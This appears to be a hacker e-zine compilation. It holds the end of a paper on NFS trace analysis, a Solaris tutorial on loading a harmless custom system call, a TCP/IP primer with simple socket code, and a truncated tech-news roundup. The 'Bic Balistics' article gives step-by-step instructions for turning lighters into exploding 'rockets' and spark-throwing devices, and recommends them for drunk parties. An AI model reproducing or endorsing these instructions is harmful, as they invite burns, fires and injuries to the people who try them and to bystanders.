correction is made for any anomalous user activity that may have occurred
during the trace.

5.1. The Workload Over Time

Intuitively, the volume of traffic can be expected to vary with the time of
day. Figure 1 shows the number of reads and writes per hour over the seven
days of the trace; in particular, the volume of write traffic seems to
mirror the general level of departmental activity fairly closely.

An important metric of NFS performance is the client buffer cache hit rate.
Each of the four cycle servers allocates approximately 6MB of memory for the
buffer cache. The (estimated) aggregate hit rate (percentage of reads served
by client caches) as seen at the file server was surprisingly low: 22.2%
over the entire week. In any given hour, the hit rate never exceeded 40%.
Figure 2 plots (actual) server reads and (estimated) cache hits per hour
over the trace week; observe that the hit rate is at its worst during
periods of the heaviest read activity.

Past studies have predicted much higher hit rates than the aggregate
observed here. It is probable that since most of the traffic is generated by
the shared cycle servers, the low hit rate can be attributed to the large
number of users competing for cache space. In fact, the hit rate was
observed to be much higher on the single-user workstations monitored in the
study, averaging above 52% overall. This suggests, somewhat
counter-intuitively, that if more computers were added to the network (such
that each user had a private workstation), the server load would decrease
considerably. Figure 3 shows the actual cache misses and estimated cache
hits for a typical private workstation in the study.


[Figure 1 - Read and Write Traffic Over Time: reads and writes per hour
(0-6000) over the trace week, Thu 00:00 through Wed 18:00; series: Writes,
Reads (all).]

5.2. File Sharing

One property observed in the DEC-SRC trace is the tendency of files that are
used by multiple workstations to make up a significant proportion of read
traffic but a very small proportion of write traffic. This has important
implications for a caching strategy, since, when it is true, files that are
cached at many places very rarely need to be invalidated. Although the
Princeton computing facility does not have a single workstation per user, a
similar metric is the degree to which files read by more than one user are
read and written. In this respect, the Princeton trace is very similar to
the DEC-SRC trace. Files read by more than one user make up more than 60% of
read traffic, but less than 2% of write traffic. Files shared by more than
ten users make up less than .2% of write traffic but still more than 30% of
read traffic. Figure 4 plots the number of users who have previously read
each file against the number of reads and writes.

5.3. File "Entropy"

Files in the DEC-SRC trace demonstrated a strong tendency to "become"
read-only as they were read more and more often. That is, the probability
that the next operation on a given file will overwrite the file drops off
sharply in proportion to the number of times it has been read in the past.
Like the sharing property, this has implications for a caching strategy,
since the probability that cached data is valid influences the choice of a
validation scheme. Again, we find this property to be very strong in the
Princeton trace. For any file access in the trace, the probability that it
is a write is about 27%. If the file has already been read at least once
since it was last written to, the write probability drops to 10%. Once the
file has been read at least five times, the write probability drops below
1%. Figure 5 plots the observed write probability against the number of
reads since the last write.


[Figure 2 - Cache Hits and Misses Over Time: total reads per hour (0-5000)
over the trace week, Thu 00:00 through Wed 18:00; series: Cache Hits
(estimated), Cache Misses (actual).]

6. Conclusions

Although filesystem traces are a useful tool for the analysis of current and
proposed systems, the difficulty of collecting meaningful trace data makes
such traces difficult to obtain. The performance degradation introduced by
the trace software and the volume of raw data generated makes traces over
long time periods and outside of computing research facilities particularly
hard to conduct.

Although not as accurate as direct, kernel-based tracing, a passive network
monitor such as the one described in this paper can permit tracing of
distributed systems relatively easily. The ability to limit the data
collected to a high-level log of only the data required can make it
practical to conduct traces over several months. Such a long term trace is
presently being conducted at Princeton as part of the author's research on
filesystem caching. The non-intrusive nature of the data collection makes
traces possible at facilities where kernel modification is impractical or
unacceptable.

It is the author's hope that other sites (particularly those not doing
computing research) will make use of this toolkit and will make the traces
available to filesystem researchers.

7. Availability

The toolkit, consisting of rpcspy, nfstrace, and several support scripts,
currently runs under several BSD-derived platforms, including ULTRIX 4.x,
SunOS 4.x, and IBM-RT/AOS. It is available for anonymous ftp over the
Internet from samadams.princeton.edu, in the compressed tar file
nfstrace/nfstrace.tar.Z.


[Figure 3 - Cache Hits and Misses Over Time - Private Workstation: reads per
hour (0-300) over the trace week, Thu 00:00 through Wed 18:00; series: Cache
Hits (estimated), Cache Misses (actual).]

[Figure 4 - Degree of Sharing for Reads and Writes: percentage of reads and
writes used by more than n users (0-100%), for n (readers) from 0 to 20;
series: Reads, Writes.]


[Figure 5 - Probability of Write Given >= n Previous Reads: P(next operation
is write) (0.0-0.2) against reads since last write, 0 to 20.]

8. Acknowledgments

The author would like to gratefully acknowledge Jim Roberts and Steve Beck
for their help in getting the trace machine up and running, Rafael Alonso
for his helpful comments and direction, and the members of the program
committee for their valuable suggestions. Jim Plank deserves special thanks
for writing jgraph, the software which produced the figures in this paper.

9. References

[1] Sandberg, R., Goldberg, D., Kleiman, S., Walsh, D., & Lyon, B. "Design
and Implementation of the Sun Network File System," Proc. USENIX, Summer
1985.

[2] Mogul, J., Rashid, R., & Accetta, M. "The Packet Filter: An Efficient
Mechanism for User-Level Network Code," Proc. 11th ACM Symp. on Operating
Systems Principles, 1987.

[3] Ousterhout, J., et al. "A Trace-Driven Analysis of the Unix 4.2 BSD File
System," Proc. 10th ACM Symp. on Operating Systems Principles, 1985.

[4] Floyd, R. "Short-Term File Reference Patterns in a UNIX Environment,"
TR-177, Dept. Comp. Sci., U. of Rochester, 1986.

[5] Baker, M., et al. "Measurements of a Distributed File System," Proc. 13th
ACM Symp. on Operating Systems Principles, 1991.

[6] Metcalfe, R. & Boggs, D. "Ethernet: Distributed Packet Switching for
Local Computer Networks," CACM, July 1976.

[7] "Etherfind(8) Manual Page," SunOS Reference Manual, Sun Microsystems,
1988.

[8] Gusella, R. "Analysis of Diskless Workstation Traffic on an Ethernet,"
TR-UCB/CSD-87/379, University of California, Berkeley, 1987.

[9] "NIT(4) Manual Page," SunOS Reference Manual, Sun Microsystems, 1988.

[10] "XDR Protocol Specification," Networking on the Sun Workstation, Sun
Microsystems, 1986.

[11] "RPC Protocol Specification," Networking on the Sun Workstation, Sun
Microsystems, 1986.

[12] "NFS Protocol Specification," Networking on the Sun Workstation, Sun
Microsystems, 1986.

[13] Postel, J. "User Datagram Protocol," RFC 768, Network Information
Center, 1980.

[14] Blaze, M., and Alonso, R. "Long-Term Caching Strategies for Very Large
Distributed File Systems," Proc. Summer 1991 USENIX, 1991.


---------------------------------------------------------------------------
Kernel Mumblings (part 1 of N)                                    FooPirata
---------------------------------------------------------------------------

The purpose of this text is to quickly introduce the Solaris 2 kernel
structure, give a shot at some ways to play with it and give some basic tools
on how to deal with the inevitable machine crashes that will happen when
you start playing with your kernel.

Unlike our beloved Linux, Solaris, even in its x86 version,
does not come with sources. Those are the property of Sun, and they can only be
bought for huge sums of money we just don't happen to have yet. But Sun, in
its incredible wisdom, now makes Solaris available to home users for the sole
price of the media, shipping and handling (about U$30). www.sun.com has more
details.

I became interested in kernel hacking after being introduced to it by
two great hackers - you readers probably don't know them - but if they ever
read this text, they'll know I am talking about them - TeleMig and Snoopy.

Introduction
============

As you all know by now, the kernel is the part of a Unix system where
the real magic happens. The kernel is responsible for the memory management,
the I/O, the timing and threading of the system. In fact, with no kernel or
a buggy one, your chances of achieving a smooth operation of your system are
close to zero.
Why would someone mess with the kernel, then?
Probably the most healthy reason would be curiosity. Nothing like
breaking something apart to see how it works. Of course there will be those
with darker purposes in their little ugly minds, but let's admit it, anybody
that would be going at a kernel for cracking purposes would not be reading
this text.
So, I'll give you the benefit of the doubt and say you're doing it
out of curiosity. This said, let's go thru a small and incomplete overview of
the Solaris kernel.
The simplest way to look at the kernel is as a resource manager,
responsible for the allocation of critical and protected resources to the
processes that need them in a safe and sane way. These resources would be CPU
time, memory space, access to I/O devices, network handling, timers, the
real-time clock, interprocess communication (IPC) and other processes.
The CPU will then work in two modes: user and kernel mode. The
differences between them are that in user mode a process will use local data,
locally mapped files and a local stack. In kernel mode a process will be using
a shared image of the kernel - and every other process running in the system
will be using this image, so things are a bit slower here.
Every time we pass from user mode to kernel mode, or the other way
round, a context switch happens. This is one of the very expensive operations
that drag down performance, and this is the reason why most of today's
kernel writers do this part of the code in assembler.
But when do context switches happen?
A user process moves from user mode to kernel mode each time a system
call is used.
System calls are function calls, like any other function, but they
all make use of syscall(3B) as the entry point into the kernel. From the
man page:

*****
SunOS/BSD Compatibility Library Functions syscall(3B)



NAME
syscall - indirect system call

SYNOPSIS
/usr/ucb/cc [ flag ... ] file ...

#include <sys/syscall.h>

int syscall(number, arg, ...)

DESCRIPTION
syscall() performs the function whose assembly language
interface has the specified number, and arguments arg ....
Symbolic constants for functions can be found in the header
<sys/syscall.h>.

RETURN VALUES
On error syscall() returns -1 and sets the external variable
errno (see intro(2)).

*****

A mapping between system call names and numbers can be found on
/etc/name_to_sysnum.
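
Before writing a new call, you can sanity-check the indirect interface with
something small like the program below; it assumes SYS_getpid is among the
constants your <sys/syscall.h> defines (it normally is), and it does not
need root.

------------------------8<------------------------8<-----------------------
#include <sys/syscall.h>
#include <stdio.h>
#include <unistd.h>

int main(int argc, char **argv)
{
        /* invoke getpid indirectly; the result should match getpid().
           SYS_getpid is assumed to be defined in <sys/syscall.h>. */
        int indirect = syscall(SYS_getpid);

        printf("syscall(SYS_getpid) = %d, getpid() = %d\n",
               indirect, (int) getpid());
        return (0);
}
------------------------8<------------------------8<-----------------------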


The System Call Mechanism
=========================

                  ++++++++++++++
                  +user process+
                  ++++++++++++++
                        |
                     system
                   call(X,....)
                        |
                        |
                        V                           User mode
-----------------------------------------------------------------
                                                    Kernel mode
                  sysent[X].sy_callc()
-----------------------------------------------------------------

All the information concerning system calls is defined in
/usr/include/sys/systm.h.
In that file we will find the definition of sysent:

struct sysent {
        char        sy_narg;        /* total number of arguments */
        char        sy_flags;       /* various flags as defined below */
        int         (*sy_call)();   /* argp, rvalp-style handler */
        krwlock_t   *sy_lock;       /* lock for loadable system calls */
        longlong_t  (*sy_callc)();  /* C-style call handler or wrapper */
};

sy_narg has the number of arguments that the specific system call
needs. sy_flags is a set of flags indicating whether this system call is
loadable, whether it is completely loaded (more on this later), whether it
can be unloaded, and whether it takes C-style arguments.
One of the nicest characteristics of Solaris is the ability to work
with loadable modules. Again, this is peanuts for the Linux community, but the
users of (normally) higher-end systems like Sparcs may see this as new.
Where does this link with system calls?
Turns out that we can write our own system calls and put them into
the kernel fairly easily. Let's see a simple example, a system call that prints
"Hello World".

First of all, take a look at /etc/name_to_sysnum:

(.....)
mount 21
umount 22
setuid 23
getuid 24
stime 25
alarm 27
fstat 28
pause 29
(.....)

Look for an unused entry. There are 210 entries, so you've got 44 to
choose from. I like 180.
Edit the file and add a line with the name of your system call:

mySyscall 180

Save the file and reboot the system. This is necessary so that the
kernel will read this file and allocate memory space as needed to accommodate
the new system call.

Ok. Now the source code. Call this file mySyscall.c:

---------------8<-----------------------8<--------------------8<-------------

/* these are all the includes normally needed to a general sys call -
we don't use many of them, but this is the normal load you'll see
on a more evolved syscall */

#include <sys/types.h>
#include <sys/vnode.h>
#include <sys/file.h>
#include <sys/cred.h>
#include <sys/stropts.h>
#include <sys/systm.h>
#include <sys/pathname.h>
#include <sys/exec.h>
#include <sys/thread.h>
#include <errno.h>
#include <sys/modctl.h>
#include <sys/syscall.h>

/* our entry point */
static int mySyscall();

static struct sysent mySysent = {
        0,                      /* number of arguments */
        0,                      /* load flags */
        mySyscall,              /* the function */
        (krwlock_t *) NULL      /* kernel lock */
};

/* this is the dynamic load & link stuff. It is sort of fill-in-the-blanks
and seems to be standard for all system calls */

extern struct mod_ops mod_syscallops;

static struct modlsys modlsys = {
        &mod_syscallops,                /* define loader routines */
        "My little system call",        /* descriptive string */
        &mySysent                       /* pointer to our sysent structure */
};

static struct modlinkage modlinkage = {
        MODREV_1,               /* loader revision number */
        (void *) &modlsys,      /* start of list of things to load here */
        0                       /* end of list */
};
/* end of dynamic load stuff */

/* this is a counter on the instances of the loaded call. this is needed
in case we want to unload but it is still in use, or something. notice
that it is static on purpose */

static int refcnt = 0;

/* this little routine is the load entry point. when we instruct the
system to load our loadable system call, the kernel will call this
function - so, if you need any initialization done, here is the place
for it */

_init()
{
        printf("MY SYSTEM CALL INITIALIZED\n");
        return (mod_install(&modlinkage));
}

/* here we do the opposite of _init, and deallocate any resources we may have
been using before unloading the system call code */

_fini()
{
        /* in case we are asked to have the syscall unloaded while it is
           still in use, we refuse the unload with a BUSY return code */

        if (refcnt != 0)
                return (EBUSY);

        printf("MY SYSTEM CALL REMOVED\n");
        return (mod_remove(&modlinkage));
}

/* tools like modinfo will return information about loadable modules
installed. this answers to those requests. */

_info(struct modinfo *modinfop)
{
        printf("REQUEST INFO ABOUT MY SYSTEM CALL\n");
        return (mod_info(&modlinkage, modinfop));
}

/* here we do the real magic. one word of advice concerning which functions
you can use here - anything that compiles without an explicit library
addition will do just fine */

mySyscall()
{
        printf("Hello World!\n");
        return(0);
}

------------------8<-------------------8<------------------8<--------------

Ok, now on to compile this little gem: as root (what, you don't have
root ? what, you thought this article was MEANT to GIVE you r00t ? you w0rm),
do:
gcc -D_KERNEL -c mySyscall.c
ld -r -o mySyscall mySyscall.o

You'll get a file called mySyscall.

We will also need a small test program. Compile this one:

------------------------8<------------------------8<-----------------------
#include <sys/syscall.h>

int main(int argc, char **argv)
{
        int i;

        i = syscall(180);
        return (i);
}
------------------------8<------------------------8<-----------------------

Call it whatever you want. Now, as root, open a window with a
running tail of /var/adm/messages. All of our messages will be printed here,
or in a console window if you happen to have one (you can also open an
xconsole).
Do:

modload mySyscall

If you get something like "can't load module: Out of memory or no room
in system tables", it means you forgot to reboot the system after changing
/etc/name_to_sysnum. Do it and let's try again.

In the xconsole or in the message file you'll see two lines, with the
messages of our _info and _init routines. Now run 'modinfo', and see that you
get the call info and a printf on the console.
Run the test program a couple of times. Notice that the "Hello World"
gets printed as you run the test program.
Now, using the index number from modinfo, do 'modunload -i N' where
N is the module id that modinfo gave you. Notice that the _fini string is
printed. The module is gone from your kernel.

That's it for today. Now, I suppose you want to go and play with your
newly gained knowledge. Do it, nothing will break, the next boot will clean
everything....I hope. Next time we will discuss adb, kadb and how to debug
these modules, and perhaps how to filter a system call to do nice things to
the host.



-----BEGIN PGP SIGNATURE-----
Version: PGP 5.0i
MessageID: gnt/Vb5XuX/pKAH8eKi/X8zyFbHIlgUB

iQA/AwUBNj19+AfcIY8lw9gyEQIW/ACgs02dG9p+KwffhkMiaIJiIGZKzAoAnAjp
Hd4y+Ja6jgItQHY7LZVFQwmw
=jTbt
-----END PGP SIGNATURE-----




---------------------------------------------------------------------------
The Internet Protocol Suite                                            m0f0
---------------------------------------------------------------------------


A network is a configuration of machines that exchange information among
them. In order for the network to function properly, the information
originating at a sender must be transmitted along a communication line and
delivered to the intended recipient in an intelligible form. Because different
types of networking software and hardware need to interact to perform this
function, network designers developed the concept of the communications
protocol family (or suite). A network protocol is a set of formal rules
explaining how software and hardware should interact within a network in order
to transmit information. The Internet Protocol (IP) family is one such group
of network protocols. It is centered around the IP. The other members of the
IP family are Transmission Control Protocol (TCP), User Datagram Protocol
(UDP), Address Resolution Protocol (ARP), Reverse Address Resolution Protocol
(RARP), and Internet Control Message Protocol (ICMP).

The entire family is popularly referred to as TCP/IP, reflecting the name
of the two main protocols. TCP/IP provides services to many different
types of host machines connected to heterogeneous networks. These networks
may be wide area networks, such as X.25-based networks, but they also can be
local area networks, such as one you might install in a single building.

Note: TCP/IP was originally developed by the United States Department
of Defense to run on the ARPANET, a packet-switching wide area network first
demonstrated in 1972. Today the ARPANET is part of a wide area network known
as the DoD (Department of Defense) Internet, or, for short, the Internet.
Many popular texts use the term Internet to describe both the protocol
family and the wide area network.

The TCP/IP protocol structure can be conceptualized as being formed of a
series of layers as shown below.

Layer         Network Services
Application   Telnet, FTP, TFTP
Transport     TCP, UDP
Network       IP, ICMP
Data Link     ARP, RARP, device driver (such as Ethernet)
Physical      Cable or other device (such as Ethernet board)

In TCP/IP jargon, a machine engaged in communication is termed either a
sending or receiving host. Every protocol layer on the sending host has its
peer protocol layer on the receiving host. Each layer is required by design
to handle communications in a predetermined fashion.

Each protocol formats communicated data and appends or removes information
from it. The protocol then passes the data to a lower layer on the sending
host or a higher layer on the receiving host.

Physical Layer

The Physical Layer is the hardware level of the protocol model, which is
concerned with electronic signals. Physical Layer protocols send and receive
data in the form of packets. A packet contains a source address, the
transmission itself, and a destination address.

TCP/IP supports a number of Physical Layer protocols, including Ethernet
and Token Ring. Ethernet is an example of a packet switching network; its
communications channels are occupied only for the duration of the
transmission of a packet. The telephone network is an example of a
circuit-switching network.

Data Link Layer

The Data Link Layer is concerned with addressing at the physical machine
level. Protocols at this layer are involved with communications
controllers, their chips, and their buffers. Ethernet is supported at this
layer by TCP/IP.

Two additional TCP/IP protocols, ARP and RARP, can be viewed as existing
between the network and data link layers. ARP is the Ethernet Address
Resolution Protocol. It maps known IP addresses (32 bits long) to Ethernet
addresses (48 bits long). RARP (or Reverse ARP) is the IP Address Resolution
Protocol. It maps known Ethernet addresses (48 bits) to IP addresses (32
bits), the reverse of ARP.

Network Layer

Internet Protocol (IP) and Internet Control Message Protocol (ICMP) are
the protocols present at the Network Layer. IP provides machine-to-machine
communication. It performs transmission routing by determining the path a
transmission must take, based on the receiving machine’s IP address. IP also
provides transmission-formatting services; it assembles data for transmission
into an Internet datagram. If the datagram is outgoing (received from the
higher layer protocols), IP attaches an IP header to it. This header contains
a number of parameters, including the IP addresses of the sending and
receiving hosts.

ICMP sends error or control messages to other hosts. It provides a way for
the Internet software on different machines to communicate with each other.

Transport Layer

The TCP/IP Transport Layer protocols enable communications between
processes running on separate machines. Protocols at this level are TCP
and UDP.

Transmission Control Protocol (TCP) enables applications to talk to each
other via virtual circuits, as though they had a physical circuit between
them. TCP is a connection-oriented, reliable protocol; any data written to
a TCP connection will be received by its peer in sequence, or an error
indication will be returned.
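
To see the virtual-circuit idea in code, here is a minimal sketch of a TCP
client; the address (192.0.2.1) and the echo port are just placeholders, and
error handling is kept to a bare minimum.

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

int main(void)
{
    struct sockaddr_in peer;
    int s;

    s = socket(AF_INET, SOCK_STREAM, 0);        /* TCP = stream socket */
    if (s < 0)
        return 1;

    memset(&peer, 0, sizeof(peer));
    peer.sin_family = AF_INET;
    peer.sin_port = htons(7);                       /* echo service   */
    peer.sin_addr.s_addr = inet_addr("192.0.2.1");  /* placeholder IP */

    /* connect() sets up the virtual circuit... */
    if (connect(s, (struct sockaddr *) &peer, sizeof(peer)) < 0)
        return 1;

    /* ...after which anything written arrives at the peer in sequence,
       or an error is reported on the connection */
    write(s, "hello\n", 6);
    close(s);
    return 0;
}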

User Datagram Protocol (UDP) is the alternative protocol available at
the Transport Layer. UDP is a connectionless datagram protocol. Datagrams
are groups of information transmitted as a unit to and from the upper layer
protocols on sending and receiving hosts. UDP datagrams use port numbers to
specify sending and receiving processes. However, no attempt is made to
recover from failure or loss; packets may be lost with no error indication
returned.
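
The same operation over UDP looks like this: each sendto() is an independent
datagram addressed by IP address and port number, with no connection set up
and no guarantee of delivery. Again, the address and port (127.0.0.1, port 9,
the discard service) are assumptions for the example:

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

int main(void)
{
    int s;
    struct sockaddr_in peer;
    const char *msg = "hello over UDP\n";

    s = socket(AF_INET, SOCK_DGRAM, 0);           /* SOCK_DGRAM = UDP */
    if (s < 0) {
        perror("socket");
        return 1;
    }

    memset(&peer, 0, sizeof(peer));
    peer.sin_family = AF_INET;
    peer.sin_port = htons(9);                     /* assumed discard port */
    peer.sin_addr.s_addr = inet_addr("127.0.0.1");

    /* The datagram may be lost with no error indication returned. */
    sendto(s, msg, strlen(msg), 0,
           (struct sockaddr *)&peer, sizeof(peer));

    close(s);
    return 0;
}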

Whether TCP or UDP is used depends on the network applications invoked by
the user. For example, if the user invokes telnet, that application passes
the user's request to TCP. If the user's request involves the Domain Name
Service, that application passes the request to UDP.

Application Layer

A variety of TCP/IP protocols exist at the Application Layer. Here is a
description of some of the more widely used protocols:

telnet
The Telnet protocol enables terminals and terminal-oriented processes to
communicate on a network running TCP/IP. It is implemented as the program
telnet on the local machine and the daemon telnetd on the remote machine.
Telnet provides a user interface through which two hosts can open
communications with each other, then send information on a
character-by-character or line-by-line basis. The application includes a
series of commands.

The telnetd daemon on the remote host handles requests from the telnet
command.

ftp
The File Transfer Protocol (FTP) transfers files to and from a remote
machine. The protocol is implemented as the ftp command on the local machine
and the ftpd daemon on the remote machine. ftp lets you specify on the
command line the host with which you want to initiate a file transfer and
options for transferring the file. The ftpd daemon on the remote host
handles the requests from your ftp command.

tftp
The Trivial File Transfer Protocol (TFTP) enables users to transfer files
to and from a remote machine. Like ftp, tftp is implemented as a program on
the local machine and as a daemon (tftpd) on the remote machine. tftp
invokes a command interpreter for transferring files and remembers which
remote machine it is talking to between file transfers; unlike ftp, it runs
over UDP and provides no user authentication.

Domain Name Service
The Domain Name Service (DNS) is a protocol that provides domain-name-to-
address mapping of forwarding hosts and mail recipients on a network.
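
From a program, that mapping is usually reached through the resolver. Here
is a small C sketch using gethostbyname(), which consults DNS on most
systems; the host name is just an example:

#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>

int main(void)
{
    struct hostent *hp;
    struct in_addr addr;

    hp = gethostbyname("www.legions.org");        /* example name */
    if (hp == NULL) {
        fprintf(stderr, "lookup failed\n");
        return 1;
    }

    memcpy(&addr, hp->h_addr_list[0], sizeof(addr));
    printf("%s -> %s\n", hp->h_name, inet_ntoa(addr));
    return 0;
}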

Other application layer protocols exist that are also implemented as a
program on the local machine and a daemon on the remote one. Examples are
rlogin and rlogind, which permit a user to log in to a remote machine;
rsh and rshd, which enable the user to spawn a shell on a remote machine;
and finger and fingerd, which permit a user to obtain information about
users on remote machines.

To avoid the need to have an excess of daemons running at all times, the
daemon inetd is initiated at start-up time. After consulting the
/etc/inetd.conf file, inetd runs the appropriate daemons as needed. For example,
the daemon rlogind will be run by inetd whenever there is a request for a
remote login from another machine, and only at that time and for the
duration of the remote login.
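
To give a feel for the format, here are a few sample /etc/inetd.conf lines.
The fields are: service name, socket type, protocol, wait/nowait, the user
the daemon runs as, the server path, and its arguments. The exact paths and
daemon names vary from system to system, so treat these as illustrations:

# service  type    proto  wait    user    server                args
ftp        stream  tcp    nowait  root    /usr/sbin/in.ftpd     in.ftpd -l
telnet     stream  tcp    nowait  root    /usr/sbin/in.telnetd  in.telnetd
login      stream  tcp    nowait  root    /usr/sbin/in.rlogind  in.rlogind
finger     stream  tcp    nowait  nobody  /usr/sbin/in.fingerd  in.fingerd
tftp       dgram   udp    wait    root    /usr/sbin/in.tftpd    in.tftpd -s /tftpboot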

m0f0


---------------------------------------------------------------------------
Bic Balistics -Anarchy Nitro
---------------------------------------------------------------------------


INTRODUCTION:

I'm sure all of you are familiar with the Bic lighter, and I'm also sure
you've tried to make the Bic Flamethrower at one time or another. Well...
here are two more things you can do. First off is the Bic Rocket, then the
Bic Sparkler. Both work almost every time! Enjoy...

MATERIALS NEEDED:

2 or more Bic lighters (the big kind)
1 large open parking lot with noncombustible material surrounding it

DIAGRAM:

[Diagram: top and side views of a Bic lighter, one as normal and one with
the flame blocker removed, labeling the flame, flame blocker, striker,
fuel areas 1 and 2, fuel valve, flint, and spring.]

PREPARATION:

First, hit the back side of the flame blocker against something and break
it off. Take off the striker and get the spring and flint. Set them aside
somewhere safe for later use. Next, pull off the fuel valve, put your
finger over the hole where the fuel comes out, and shake it up. Leave your
finger on the hole.

LAUNCHING:

Find someplace where you can lay the lighter so the bottom faces up. Set it
there, take the other lighter, and light the rocket. It should burn just like
it normally does, except the flame should be melting the plastic. It melts
down to the fuel and... one of three things happens: it flies up into the air
and explodes (usually about 10-20 feet up), skips along the ground, or just
explodes. It usually takes about 2 minutes for it to burn through the plastic.
Whatever you do, don't go back to the lighter after it's been burning for
more than 1 minute, and only go back if the flame has gone out!

BIC SPARKLER:

This isn't really a sparkler, but it sure is fun. Take the flint and the
spring you set aside from the rocket and wrap the flint in the spring: pull
the spring apart, put the flint in the middle so it forms a plus sign, and
then twist the spring once so it looks like this:

Flint
\
||
."||". <- Spring
." ".
" "
Hold it over the flame of the one lighter you have left until it starts to
wrinkle up or glow red. Then throw it against a wall and, whoosh, sparks fly
everywhere, leaving a little char mark on the wall.

CONCLUSION:

Enjoy these; they're lots of fun at parties when everyone's drunk, and the
sparkler is really trippy then. They are both best at night, but good during
the day as well.



---------------------------------------------------------------------------
News Bank Sources
---------------------------------------------------------------------------


**************|-*
* Telephony (mobile computing)
**************|-*



-----------------------------------------------------
3Com Unveils VPN Tunnel Switches
-----------------------------------------------------
3Com Corp. launched the Path Builder S500 series platforms,
a family of purpose-built Virtual Private Network (VPN) tunnel
switches that enables companies to migrate their existing
remote access and routed site-to-site networks to next-generation
VPNs. The switches allow enterprises to cut monthly costs on
remote access long distance or 800 numbers by 50 percent or more.
The Path Builder S500 family of tunnel switches was purpose-built
to scale VPN networks to handle hundreds to thousands of
users and sites with wire-speed encrypted security.


-----------------------------------------------------
Ericsson Rejects Qualcomm Threat in U.S.-EU Standards
-----------------------------------------------------


Swedish telecommunications equipment maker Ericsson says it
will retaliate if U.S. high-tech company Qualcomm Inc. does
not license key technologies to European rivals.






**************|-*
* Network (modern advances)
**************|-*

-----------------------------------------------------
IBM, Intel Back New UNIX for All Intel Server Systems
-----------------------------------------------------

IBM Corp., Intel Corp. and other key players teamed up to develop a single UNIX
product line for Intel's present 32-bit IA-32 chip-based systems and future
64-bit IA-64 chip-based systems. Their announced aim is to produce a new single UNIX
line that will run across Intel microprocessor systems that range from entry-level
servers to large enterprise environments. The two giants entered into a strategic
business agreement with UNIX systems design firm SCO Inc., of Santa Cruz, CA.

Under the agreement, IBM will make SCO's UnixWare 7 its 32-bit UNIX operating system
for the high-volume Intel architecture enterpr
